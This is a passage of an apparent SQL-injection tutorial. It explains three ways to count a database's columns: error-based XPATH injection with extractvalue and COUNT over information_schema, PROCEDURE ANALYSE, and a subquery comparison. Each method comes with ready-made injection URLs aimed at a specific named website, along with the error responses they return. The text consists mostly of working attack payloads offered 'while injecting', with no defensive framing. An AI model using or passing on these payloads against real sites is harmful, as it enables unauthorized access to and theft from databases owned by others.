METHOD  2
Using COUNT Function
In this Method we will use COUNT Function for Counting The Total Number Of Columns.We will Use Count Function with XPATH or Error Based Injection.And We Have to Also Guess One Table Name for Counting All Valid Columns from the Database.
I Will Use XPATH Injection With Extractvalue.
For Example,

http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='TABLE_NAME_HERE' and table_schema=database())))--+

Replace TABLE_NAME_HERE with any one Table Name From the Database and Execute this Command .It will Return Total Number of Columns from The Database.

http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='news' and table_schema=database())))--+

XPATH syntax error:':8'
so it Means There are 8 Total Number of Columns.

METHOD 3
USING PROCEDURE ANALYSE Function
Just Few People Knows This Method .We Will Use PROCEDURE ANALYSE Function In this Method For Counting Total Number of Columns.This Function Works really Amazing.We will just Execute this Command And see the Response from the Target Site.

http://www.pistoiablues.com/news.php?id=111' Procedure Analyse()--+

Here we Didn't Get Any kind of Error.But if we Notice the  Web Page we Can See there are 8 Slashes .So it means Total Number of Columns Are 8.

METHOD 4
Using URL Tables
In This Method we will Count Total Number of Columns through The Tables which were in our Target URL. For Example.
Product.php?id=
Page.php?id=
News.php?id=
This Command works behind The SQL Query which is in the PHP CODING that Script.
For Example , We Gave Command For Counting The Columns.

News.php?id=2 order by 3

So the Query which works behind is

SELECT * FROM NEWS WHERE ID=2

We will Use those Tables for Preparing Our Columns Count Command.

http://www.pistoiablues.com/news.php?id=111' and (select * from news)=(select 0)--+

And we got Total Number of Columns are 8.
Operand should contain 8 column(s)
These are Easy and simple ways For Counting Total Number of Columns At one Request and Will Help you guys while injecting.
------------------------------------------------------------------------------------------